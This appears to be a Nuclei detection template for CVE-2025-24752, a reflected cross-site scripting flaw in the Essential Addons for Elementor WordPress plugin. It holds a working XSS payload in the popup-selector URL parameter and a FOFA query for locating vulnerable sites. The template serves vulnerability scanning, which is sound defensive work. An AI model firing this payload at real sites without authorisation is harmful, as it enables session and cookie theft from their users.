id: CVE-2025-24752

info:
  name: Essential Addons for Elementor < 6.0.15 - Cross-Site Scripting
  author: DhiyaneshDK
  severity: medium
  description: |
    A Cross-Site Scripting (XSS) vulnerability exists in Essential Addons for Elementor Plugin for WordPress versions prior to 6.0.15. The vulnerability allows an attacker to inject malicious JavaScript payloads into web pages by exploiting insufficient input sanitization and output escaping in specific plugin components.
  remediation: |
    Upgrade Essential Addons for Elementor to version 6.0.15 or later that properly sanitizes and escapes user input in plugin components.
  impact: |
    Attackers can execute arbitrary scripts in users' browsers, potentially stealing cookies, session tokens, or performing actions on behalf of users.
  reference:
    - https://www.tenable.com/plugins/was/114609
    - https://patchstack.com/articles/reflected-xss-patched-in-essential-addons-for-elementor-affecting-2-million-sites/
    - https://github.com/Sachinart/essential-addons-for-elementor-xss-poc/blob/main/poc.py
  classification:
    epss-score: 0.03968
    epss-percentile: 0.88585
  metadata:
    verified: true
    max-request: 1
    fofa-query: body="/wp-content/plugins/essential-addons-for-elementor-lite"
  tags: cve,cve2025,xss,essential,elementor-lite,vkev,vuln

variables:
  random_int: '{{rand_int(1,1000)}}'

headless:
  - steps:
      - args:
          url: '{{BaseURL}}/?popup-selector=<img_src%3Dx_onerror%3Dalert%28%27{{random_int}}n%27%29>&eael-lostpassword=1'
        action: navigate

      - action: waitdialog
        name: subdomain_object_dom

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - subdomain_object_dom == true

      - type: word
        part: body
        words:
          - "{{random_int}}"
        case-insensitive: true
# digest: 490a0046304402204e9a562da39945cdfa4fda9274eb8c35ded8097e5c0362711322eb728b0abd4c0220253f53c6d4e2cc47ad2c0fcb70d90197e312b9b6f11efebd7d6808443821810e:922c64590222798bb761d5b6d8e72950